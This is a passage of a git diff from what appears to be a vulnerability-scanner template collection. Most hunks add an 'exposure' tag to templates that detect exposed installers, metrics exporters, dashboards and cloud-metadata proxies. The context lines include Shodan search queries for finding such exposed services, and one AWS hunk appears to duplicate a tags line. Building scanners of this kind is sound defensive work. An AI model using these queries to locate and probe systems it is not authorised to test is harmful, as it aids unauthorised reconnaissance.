b/http/misconfiguration/installer/moodle-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Installation Moodle" - tags: misconfig,moodle,install + tags: misconfig,moodle,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/nagiosxi-installer.yaml b/http/misconfiguration/installer/nagiosxi-installer.yaml index 1109a2ec96..b7ae335ee1 100644 --- a/http/misconfiguration/installer/nagiosxi-installer.yaml +++ b/http/misconfiguration/installer/nagiosxi-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Nagios XI" - tags: misconfig,install,nagiosxi + tags: misconfig,exposure,install,nagiosxi http: - method: GET diff --git a/http/misconfiguration/installer/netsparker-enterprise-installer.yaml b/http/misconfiguration/installer/netsparker-enterprise-installer.yaml index b5f38e3405..d6fec0b55b 100644 --- a/http/misconfiguration/installer/netsparker-enterprise-installer.yaml +++ b/http/misconfiguration/installer/netsparker-enterprise-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-1575154882 - tags: misconfig,install,netsparker + tags: misconfig,exposure,install,netsparker http: - method: GET diff --git a/http/misconfiguration/installer/nginx-auto-installer.yaml b/http/misconfiguration/installer/nginx-auto-installer.yaml index 3685a4663c..ed36827ea6 100644 --- a/http/misconfiguration/installer/nginx-auto-installer.yaml +++ b/http/misconfiguration/installer/nginx-auto-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"NginX Auto Installer" - tags: misconfig,nginx,install + tags: misconfig,nginx,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/nodebb-installer.yaml b/http/misconfiguration/installer/nodebb-installer.yaml index 942a8bcd28..d8ec1bd66c 100644 --- a/http/misconfiguration/installer/nodebb-installer.yaml +++ b/http/misconfiguration/installer/nodebb-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"NodeBB Web Installer" - tags: misconfig,nodebb,install + tags: misconfig,nodebb,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/openmage-install.yaml b/http/misconfiguration/installer/openmage-install.yaml index 5602f5a819..38c3a5aca5 100644 --- a/http/misconfiguration/installer/openmage-install.yaml +++ b/http/misconfiguration/installer/openmage-install.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"OpenMage Installation Wizard" - tags: misconfig,openmage,install + tags: misconfig,openmage,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/opensis-installer.yaml b/http/misconfiguration/installer/opensis-installer.yaml index cc0ce060e5..e06525b21c 100644 --- a/http/misconfiguration/installer/opensis-installer.yaml +++ b/http/misconfiguration/installer/opensis-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"openSIS" - tags: misconfig,opensis,install + tags: misconfig,opensis,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/orangehrm-installer.yaml b/http/misconfiguration/installer/orangehrm-installer.yaml index be81cfb83a..1a39e9b35d 100644 --- a/http/misconfiguration/installer/orangehrm-installer.yaml +++ b/http/misconfiguration/installer/orangehrm-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"OrangeHRM Web Installation Wizard" - tags: misconfig,install,orangehrm + tags: misconfig,exposure,install,orangehrm http: - method: GET diff --git a/http/misconfiguration/installer/owncloud-installer-exposure.yaml b/http/misconfiguration/installer/owncloud-installer-exposure.yaml index 18bd404f45..82f8fc4ddf 100644 --- a/http/misconfiguration/installer/owncloud-installer-exposure.yaml +++ b/http/misconfiguration/installer/owncloud-installer-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 2 verified: true shodan-query: title:"owncloud" - tags: misconfig,owncloud,install + tags: misconfig,owncloud,exposure,install http: - method: GET diff --git a/http/misconfiguration/installer/oxid-eshop-installer.yaml b/http/misconfiguration/installer/oxid-eshop-installer.yaml index ad7a32bd98..fd622b3ee1 100644 --- a/http/misconfiguration/installer/oxid-eshop-installer.yaml +++ b/http/misconfiguration/installer/oxid-eshop-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"OXID eShop installation" - tags: misconfig,oxid,eshop,install + tags: misconfig,oxid,eshop,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/pagekit-installer.yaml b/http/misconfiguration/installer/pagekit-installer.yaml index 7021a8e3ef..b8bae2821e 100644 --- a/http/misconfiguration/installer/pagekit-installer.yaml +++ b/http/misconfiguration/installer/pagekit-installer.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Pagekit Installer" - tags: misconfig,pagekit,install + tags: misconfig,pagekit,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/permissions-installer.yaml b/http/misconfiguration/installer/permissions-installer.yaml index 13f2963fc5..a2a2b4264d 100644 --- a/http/misconfiguration/installer/permissions-installer.yaml +++ b/http/misconfiguration/installer/permissions-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:" Permissions | Installer" - tags: misconfig,permissions,install + tags: misconfig,permissions,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/phpbb-installer.yaml b/http/misconfiguration/installer/phpbb-installer.yaml index cd086f4c55..65c3457828 100644 --- a/http/misconfiguration/installer/phpbb-installer.yaml +++ b/http/misconfiguration/installer/phpbb-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"Installation Panel" - tags: misconfig,phpbb,install + tags: misconfig,phpbb,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/phpwind-installer.yaml b/http/misconfiguration/installer/phpwind-installer.yaml index e4a899bbb9..808b181e7d 100644 --- a/http/misconfiguration/installer/phpwind-installer.yaml +++ b/http/misconfiguration/installer/phpwind-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Powered by phpwind" - tags: misconfig,phpwind,install + tags: misconfig,phpwind,exposure,install http: - method: GET diff --git a/http/misconfiguration/installer/pmm-installer.yaml b/http/misconfiguration/installer/pmm-installer.yaml index 6e1d734ac5..71e36809b5 100644 --- a/http/misconfiguration/installer/pmm-installer.yaml +++ b/http/misconfiguration/installer/pmm-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"PMM Installation Wizard" - tags: misconfig,install,pmm + tags: misconfig,exposure,install,pmm http: - method: GET diff --git a/http/misconfiguration/installer/prestashop-installer.yaml b/http/misconfiguration/installer/prestashop-installer.yaml index 12bc3aaf50..72f37583b1 100644 --- a/http/misconfiguration/installer/prestashop-installer.yaml +++ b/http/misconfiguration/installer/prestashop-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"PrestaShop Installation Assistant" - tags: misconfig,prestashop,install + tags: misconfig,prestashop,exposure,install http: - method: GET diff --git a/http/misconfiguration/installer/processwire-installer.yaml b/http/misconfiguration/installer/processwire-installer.yaml index de1206c72b..15769013b2 100644 --- a/http/misconfiguration/installer/processwire-installer.yaml +++ b/http/misconfiguration/installer/processwire-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 2 verified: true shodan-query: title:"ProcessWire 3.x Installer" - tags: misconfig,processwire,install + tags: misconfig,processwire,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/server-monitor-installer.yaml b/http/misconfiguration/installer/server-monitor-installer.yaml index d95d49f985..7b27e614f2 100644 --- a/http/misconfiguration/installer/server-monitor-installer.yaml +++ b/http/misconfiguration/installer/server-monitor-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"SERVER MONITOR - Install" - tags: misconfig,monitor,install + tags: misconfig,monitor,exposure,install http: - method: GET diff --git a/http/misconfiguration/installer/smf-installer.yaml b/http/misconfiguration/installer/smf-installer.yaml index dd79cac71b..f5c08c5ac0 100644 --- a/http/misconfiguration/installer/smf-installer.yaml +++ b/http/misconfiguration/installer/smf-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"SMF Installer" - tags: misconfig,smf,install + tags: misconfig,smf,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/sumowebtools-installer.yaml b/http/misconfiguration/installer/sumowebtools-installer.yaml index f363bf8e96..dfb04eaf79 100644 --- a/http/misconfiguration/installer/sumowebtools-installer.yaml +++ b/http/misconfiguration/installer/sumowebtools-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"SumoWebTools Installer" - tags: misconfig,sumowebtools,install + tags: misconfig,sumowebtools,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/tasmota-install.yaml b/http/misconfiguration/installer/tasmota-install.yaml index ed0a9aecbf..b3307862ea 100644 --- a/http/misconfiguration/installer/tasmota-install.yaml +++ b/http/misconfiguration/installer/tasmota-install.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Tasmota" - tags: misconfig,tasmota,install + tags: misconfig,tasmota,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/testrail-install.yaml b/http/misconfiguration/installer/testrail-install.yaml index 95ae9ab555..fddace6e3a 100644 --- a/http/misconfiguration/installer/testrail-install.yaml +++ b/http/misconfiguration/installer/testrail-install.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"TestRail Installation Wizard" - tags: misconfig,testrail,install + tags: misconfig,testrail,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/turbo-website-installer.yaml b/http/misconfiguration/installer/turbo-website-installer.yaml index 2502b3d918..e76ec30db6 100644 --- a/http/misconfiguration/installer/turbo-website-installer.yaml +++ b/http/misconfiguration/installer/turbo-website-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Turbo Website Reviewer" - tags: turbo,misconfig,install + tags: turbo,misconfig,exposure,install http: - method: GET diff --git a/http/misconfiguration/installer/unifi-wizard-install.yaml b/http/misconfiguration/installer/unifi-wizard-install.yaml index 297c7eb19a..f1ce3569be 100644 --- a/http/misconfiguration/installer/unifi-wizard-install.yaml +++ b/http/misconfiguration/installer/unifi-wizard-install.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"UniFi Wizard" - tags: misconfig,install,unifi + tags: misconfig,install,unifi,exposure http: - method: GET diff --git a/http/misconfiguration/installer/uvdesk-install.yaml b/http/misconfiguration/installer/uvdesk-install.yaml index 5fdabb0a7f..16603bf141 100644 --- a/http/misconfiguration/installer/uvdesk-install.yaml +++ b/http/misconfiguration/installer/uvdesk-install.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"UVDesk Helpdesk Community Edition - Installation Wizard" - tags: misconfig,uvdesk,install + tags: misconfig,uvdesk,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/vtiger-installer.yaml b/http/misconfiguration/installer/vtiger-installer.yaml index ee889c4313..e4d11b1156 100644 --- a/http/misconfiguration/installer/vtiger-installer.yaml +++ b/http/misconfiguration/installer/vtiger-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: html:"Welcome to Vtiger CRM" - tags: misconfig,vtiger,install + tags: misconfig,vtiger,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/webasyst-installer.yaml b/http/misconfiguration/installer/webasyst-installer.yaml index c94b150321..c84bf7530a 100644 --- a/http/misconfiguration/installer/webasyst-installer.yaml +++ b/http/misconfiguration/installer/webasyst-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"Webasyst Installer" - tags: misconfig,webasyst,install + tags: misconfig,webasyst,install,exposure http: - method: GET diff --git a/http/misconfiguration/installer/webuzo-installer.yaml b/http/misconfiguration/installer/webuzo-installer.yaml index 7d37a808da..e575895e97 100644 --- a/http/misconfiguration/installer/webuzo-installer.yaml +++ b/http/misconfiguration/installer/webuzo-installer.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Webuzo Installer" - tags: misconfig,webuzo,install + tags: misconfig,webuzo,install,exposure http: - method: GET diff --git a/http/misconfiguration/iot-vdme-simulator.yaml b/http/misconfiguration/iot-vdme-simulator.yaml index c8d292ccbc..5635615a84 100644 --- a/http/misconfiguration/iot-vdme-simulator.yaml +++ b/http/misconfiguration/iot-vdme-simulator.yaml @@ -14,7 +14,7 @@ info: max-request: 2 verified: true shodan-query: http.title:"IoT vDME Simulator" - tags: misconfig,panel + tags: exposure,misconfig,panel http: - method: GET diff --git a/http/misconfiguration/kubernetes/kube-state-metrics.yaml b/http/misconfiguration/kubernetes/kube-state-metrics.yaml index 9d6de5c290..25b0a450ac 100644 --- a/http/misconfiguration/kubernetes/kube-state-metrics.yaml +++ b/http/misconfiguration/kubernetes/kube-state-metrics.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:Kube-state-metrics - tags: misconfig,kube-state-metrics,k8s,kubernetes + tags: misconfig,exposure,kube-state-metrics,k8s,kubernetes http: - method: GET diff --git a/http/misconfiguration/kubernetes/kubernetes-metrics.yaml b/http/misconfiguration/kubernetes/kubernetes-metrics.yaml index 76935c7462..0a34a584e0 100644 --- a/http/misconfiguration/kubernetes/kubernetes-metrics.yaml +++ b/http/misconfiguration/kubernetes/kubernetes-metrics.yaml @@ -7,7 +7,7 @@ info: description: Information Disclosure of Garbage Collection reference: - https://kubernetes.io/docs/concepts/cluster-administration/system-metrics/#metrics-in-kubernetes - tags: kubernetes,devops,misconfig + tags: kubernetes,exposure,devops,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml b/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml index 5f385f3f38..bb0dd8de6c 100644 --- a/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml +++ b/http/misconfiguration/kubernetes/kubernetes-resource-report.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: medium description: Information Disclosure of Kubernetes Resource Report - tags: kubernetes,misconfig + tags: kubernetes,exposure,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/libvirt-exporter-metrics.yaml b/http/misconfiguration/libvirt-exporter-metrics.yaml index 2700b97e1f..9202b6dd16 100644 --- a/http/misconfiguration/libvirt-exporter-metrics.yaml +++ b/http/misconfiguration/libvirt-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Libvirt" - tags: libvirt,debug,misconfig + tags: libvirt,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/liferay/liferay-api.yaml b/http/misconfiguration/liferay/liferay-api.yaml index 59691ffa5f..40f0ada3b8 100644 --- a/http/misconfiguration/liferay/liferay-api.yaml +++ b/http/misconfiguration/liferay/liferay-api.yaml @@ -9,7 +9,7 @@ info: verified: true shodan-query: title:"Liferay" reference: https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java - tags: liferay,api,misconfig + tags: liferay,exposure,api,misconfig http: - method: GET diff --git a/http/misconfiguration/liferay/liferay-axis.yaml b/http/misconfiguration/liferay/liferay-axis.yaml index 39b44d81c2..8a22f20eb8 100644 --- a/http/misconfiguration/liferay/liferay-axis.yaml +++ b/http/misconfiguration/liferay/liferay-axis.yaml @@ -9,7 +9,7 @@ info: max-request: 1 verified: true shodan-query: title:"Liferay" - tags: misconfig,liferay,api + tags: misconfig,exposure,liferay,api http: - method: GET diff --git a/http/misconfiguration/liferay/liferay-jsonws.yaml b/http/misconfiguration/liferay/liferay-jsonws.yaml index d44d3702ad..7103a00be8 100644 --- a/http/misconfiguration/liferay/liferay-jsonws.yaml +++ b/http/misconfiguration/liferay/liferay-jsonws.yaml @@ -11,7 +11,7 @@ info: max-request: 1 verified: true shodan-query: title:"Liferay" - tags: liferay,api,misconfig + tags: liferay,exposure,api,misconfig http: - method: GET diff --git a/http/misconfiguration/linktap-gateway-exposure.yaml b/http/misconfiguration/linktap-gateway-exposure.yaml index cf8c7ceabc..0869d4a2e4 100644 --- a/http/misconfiguration/linktap-gateway-exposure.yaml +++ b/http/misconfiguration/linktap-gateway-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"LinkTap Gateway" - tags: misconfig,linktap,iot + tags: misconfig,linktap,iot,exposure http: - method: GET diff --git a/http/misconfiguration/locust-exposure.yaml b/http/misconfiguration/locust-exposure.yaml index ab5df5d99a..1bb8313957 100644 --- a/http/misconfiguration/locust-exposure.yaml +++ b/http/misconfiguration/locust-exposure.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Locust" - tags: locust,misconfig + tags: exposure,locust,misconfig http: - method: GET diff --git a/http/misconfiguration/lvm-exporter-metrics.yaml b/http/misconfiguration/lvm-exporter-metrics.yaml index 0ac14a1d8d..33c448eb6c 100644 --- a/http/misconfiguration/lvm-exporter-metrics.yaml +++ b/http/misconfiguration/lvm-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"LVM Exporter" - tags: lvm,debug,misconfig + tags: lvm,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/mobiproxy-dashboard.yaml b/http/misconfiguration/mobiproxy-dashboard.yaml index 91f1f3d049..476af11cdc 100644 --- a/http/misconfiguration/mobiproxy-dashboard.yaml +++ b/http/misconfiguration/mobiproxy-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"MobiProxy" - tags: dashboard,mobiproxy,misconfig + tags: dashboard,exposure,mobiproxy,misconfig http: - method: GET diff --git a/http/misconfiguration/moleculer-microservices.yaml b/http/misconfiguration/moleculer-microservices.yaml index c82f7d31b1..13c926b0c8 100644 --- a/http/misconfiguration/moleculer-microservices.yaml +++ b/http/misconfiguration/moleculer-microservices.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: title:"Moleculer Microservices Project" - tags: misconfig,microservice,moleculer + tags: misconfig,microservice,moleculer,exposure http: - method: GET diff --git a/http/misconfiguration/mongodb-exporter-metrics.yaml b/http/misconfiguration/mongodb-exporter-metrics.yaml index 48b5ccc8b2..7456b8b552 100644 --- a/http/misconfiguration/mongodb-exporter-metrics.yaml +++ b/http/misconfiguration/mongodb-exporter-metrics.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-200 reference: - https://github.com/percona/mongodb_exporter - tags: mongodb,debug,misconfig + tags: mongodb,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/mysqld-exporter-metrics.yaml b/http/misconfiguration/mysqld-exporter-metrics.yaml index c4288ed2ee..4b8ab53da1 100644 --- a/http/misconfiguration/mysqld-exporter-metrics.yaml +++ b/http/misconfiguration/mysqld-exporter-metrics.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"MySQLd exporter" - tags: mysqld,debug,misconfig + tags: mysqld,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/namedprocess-exporter-metrics.yaml b/http/misconfiguration/namedprocess-exporter-metrics.yaml index f5d29af977..5f816d4696 100644 --- a/http/misconfiguration/namedprocess-exporter-metrics.yaml +++ b/http/misconfiguration/namedprocess-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Named Process Exporter" - tags: namedprocess,debug,misconfig + tags: namedprocess,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/node-exporter-metrics.yaml b/http/misconfiguration/node-exporter-metrics.yaml index 16df710958..712d75131a 100644 --- a/http/misconfiguration/node-exporter-metrics.yaml +++ b/http/misconfiguration/node-exporter-metrics.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: low description: Information Disclosure of Garbage Collection - tags: node,debug,misconfig + tags: node,exposure,debug,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/ntop-panel-exposed.yaml b/http/misconfiguration/ntop-panel-exposed.yaml index f69624d90c..38d855fb20 100644 --- a/http/misconfiguration/ntop-panel-exposed.yaml +++ b/http/misconfiguration/ntop-panel-exposed.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Configure ntop" - tags: misconfig,ntop + tags: misconfig,ntop,exposure http: - method: GET diff --git a/http/misconfiguration/oneinstack-control-center.yaml b/http/misconfiguration/oneinstack-control-center.yaml index 1341cc8055..6f2b06c0cb 100644 --- a/http/misconfiguration/oneinstack-control-center.yaml +++ b/http/misconfiguration/oneinstack-control-center.yaml @@ -17,7 +17,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"OneinStack" - tags: misconfig,panel,oneinstack + tags: misconfig,exposure,panel,oneinstack http: - method: GET diff --git a/http/misconfiguration/pa11y-dashboard.yaml b/http/misconfiguration/pa11y-dashboard.yaml index 3487da57c1..1cd110590a 100644 --- a/http/misconfiguration/pa11y-dashboard.yaml +++ b/http/misconfiguration/pa11y-dashboard.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Pa11y Dashboard" - tags: misconfig,pa11y + tags: misconfig,exposure,pa11y http: - method: GET diff --git a/http/misconfiguration/pghero-dashboard-exposure.yaml b/http/misconfiguration/pghero-dashboard-exposure.yaml index 87b5274549..5c3330f429 100644 --- a/http/misconfiguration/pghero-dashboard-exposure.yaml +++ b/http/misconfiguration/pghero-dashboard-exposure.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: title:"PgHero" - tags: panel,pghero,misconfig + tags: exposure,panel,pghero,misconfig http: - method: GET diff --git a/http/misconfiguration/phpmemcached-admin-panel.yaml b/http/misconfiguration/phpmemcached-admin-panel.yaml index 4ee30b5823..71370a61c7 100644 --- a/http/misconfiguration/phpmemcached-admin-panel.yaml +++ b/http/misconfiguration/phpmemcached-admin-panel.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"phpMemcachedAdmin" - tags: phpmemcached,misconfig + tags: phpmemcached,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/postgres-exporter-metrics.yaml b/http/misconfiguration/postgres-exporter-metrics.yaml index f2136eefb4..1a60b3097b 100644 --- a/http/misconfiguration/postgres-exporter-metrics.yaml +++ b/http/misconfiguration/postgres-exporter-metrics.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:"Postgres exporter" - tags: postgres,debug,misconfig + tags: postgres,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/private-key-exposure.yaml b/http/misconfiguration/private-key-exposure.yaml index f21c911d06..25b48cb168 100644 --- a/http/misconfiguration/private-key-exposure.yaml +++ b/http/misconfiguration/private-key-exposure.yaml @@ -5,7 +5,7 @@ info: author: aashiq severity: high description: Searches for private key exposure by attempting to query the helper endpoint on node_modules - tags: node,misconfig + tags: exposure,node,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/proxy/metadata-alibaba.yaml b/http/misconfiguration/proxy/metadata-alibaba.yaml index 258d3f383f..fa218fd9fd 100644 --- a/http/misconfiguration/proxy/metadata-alibaba.yaml +++ b/http/misconfiguration/proxy/metadata-alibaba.yaml @@ -22,7 +22,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: config,alibaba,proxy,misconfig,metadata + tags: exposure,config,alibaba,proxy,misconfig,metadata metadata: max-request: 2 diff --git a/http/misconfiguration/proxy/metadata-aws.yaml b/http/misconfiguration/proxy/metadata-aws.yaml index a72f563785..f8fa2279c4 100644 --- a/http/misconfiguration/proxy/metadata-aws.yaml +++ b/http/misconfiguration/proxy/metadata-aws.yaml @@ -24,6 +24,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + tags: exposure,proxy,aws,amazon,misconfig,metadata metadata: max-request: 4 tags: exposure,proxy,aws,amazon,misconfig,metadata diff --git a/http/misconfiguration/proxy/metadata-azure.yaml b/http/misconfiguration/proxy/metadata-azure.yaml index bc0e6b9283..554164e929 100644 --- a/http/misconfiguration/proxy/metadata-azure.yaml +++ b/http/misconfiguration/proxy/metadata-azure.yaml @@ -22,7 +22,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: config,azure,microsoft,proxy,misconfig,metadata + tags: exposure,config,azure,microsoft,proxy,misconfig,metadata metadata: max-request: 2 diff --git a/http/misconfiguration/proxy/metadata-digitalocean.yaml b/http/misconfiguration/proxy/metadata-digitalocean.yaml index 2e2dc9c747..1c49028334 100644 --- a/http/misconfiguration/proxy/metadata-digitalocean.yaml +++ b/http/misconfiguration/proxy/metadata-digitalocean.yaml @@ -22,7 +22,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: config,digitalocean,proxy,misconfig,metadata + tags: exposure,config,digitalocean,proxy,misconfig,metadata metadata: max-request: 2 diff --git a/http/misconfiguration/proxy/metadata-google.yaml b/http/misconfiguration/proxy/metadata-google.yaml index 145dc4042f..3ffc361fb7 100644 --- a/http/misconfiguration/proxy/metadata-google.yaml +++ b/http/misconfiguration/proxy/metadata-google.yaml @@ -22,7 +22,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: config,google,gcp,proxy,misconfig,metadata + tags: exposure,config,google,gcp,proxy,misconfig,metadata metadata: max-request: 2 diff --git a/http/misconfiguration/proxy/metadata-hetzner.yaml b/http/misconfiguration/proxy/metadata-hetzner.yaml index 519918f8e0..460f307796 100644 --- a/http/misconfiguration/proxy/metadata-hetzner.yaml +++ b/http/misconfiguration/proxy/metadata-hetzner.yaml @@ -22,7 +22,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: config,hetzner,proxy,misconfig,metadata + tags: exposure,config,hetzner,proxy,misconfig,metadata metadata: max-request: 2 diff --git a/http/misconfiguration/proxy/metadata-openstack.yaml b/http/misconfiguration/proxy/metadata-openstack.yaml index 9475628423..cfc1139326 100644 --- a/http/misconfiguration/proxy/metadata-openstack.yaml +++ b/http/misconfiguration/proxy/metadata-openstack.yaml @@ -22,7 +22,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: config,openstack,proxy,misconfig,metadata + tags: exposure,config,openstack,proxy,misconfig,metadata metadata: max-request: 2 diff --git a/http/misconfiguration/proxy/metadata-oracle.yaml b/http/misconfiguration/proxy/metadata-oracle.yaml index 23d1669e6a..866f0ebbac 100644 --- a/http/misconfiguration/proxy/metadata-oracle.yaml +++ b/http/misconfiguration/proxy/metadata-oracle.yaml @@ -22,7 +22,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: config,oracle,proxy,misconfig,metadata + tags: exposure,config,oracle,proxy,misconfig,metadata metadata: max-request: 2 diff --git a/http/misconfiguration/proxy/open-proxy-internal.yaml b/http/misconfiguration/proxy/open-proxy-internal.yaml index 8f8a765e97..1d2c520930 100644 --- a/http/misconfiguration/proxy/open-proxy-internal.yaml +++ b/http/misconfiguration/proxy/open-proxy-internal.yaml @@ -14,7 +14,7 @@ info: cvss-score: 8.6 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. - tags: config,proxy,misconfig,fuzz + tags: exposure,config,proxy,misconfig,fuzz metadata: max-request: 25 diff --git a/http/misconfiguration/proxy/open-proxy-localhost.yaml b/http/misconfiguration/proxy/open-proxy-localhost.yaml index 15c0718ee7..f5edeaddff 100644 --- a/http/misconfiguration/proxy/open-proxy-localhost.yaml +++ b/http/misconfiguration/proxy/open-proxy-localhost.yaml @@ -14,7 +14,7 @@ info: cvss-score: 8.6 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. - tags: config,proxy,misconfig,fuzz + tags: exposure,config,proxy,misconfig,fuzz metadata: max-request: 6 diff --git a/http/misconfiguration/proxy/open-proxy-portscan.yaml b/http/misconfiguration/proxy/open-proxy-portscan.yaml index 05f7aa41ae..a4a9953167 100644 --- a/http/misconfiguration/proxy/open-proxy-portscan.yaml +++ b/http/misconfiguration/proxy/open-proxy-portscan.yaml @@ -14,7 +14,7 @@ info: cvss-score: 8.6 cwe-id: CWE-441 remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. - tags: config,proxy,misconfig,fuzz + tags: exposure,config,proxy,misconfig,fuzz metadata: max-request: 8 diff --git a/http/misconfiguration/puppetdb-dashboard.yaml b/http/misconfiguration/puppetdb-dashboard.yaml index ed55bc6a69..0430efbf75 100644 --- a/http/misconfiguration/puppetdb-dashboard.yaml +++ b/http/misconfiguration/puppetdb-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: 'title:"PuppetDB: Dashboard"' - tags: misconfig,puppetdb + tags: misconfig,exposure,puppetdb http: - method: GET diff --git a/http/misconfiguration/python-metrics.yaml b/http/misconfiguration/python-metrics.yaml index 7b404b8819..33c9dabef0 100644 --- a/http/misconfiguration/python-metrics.yaml +++ b/http/misconfiguration/python-metrics.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 shodan-query: 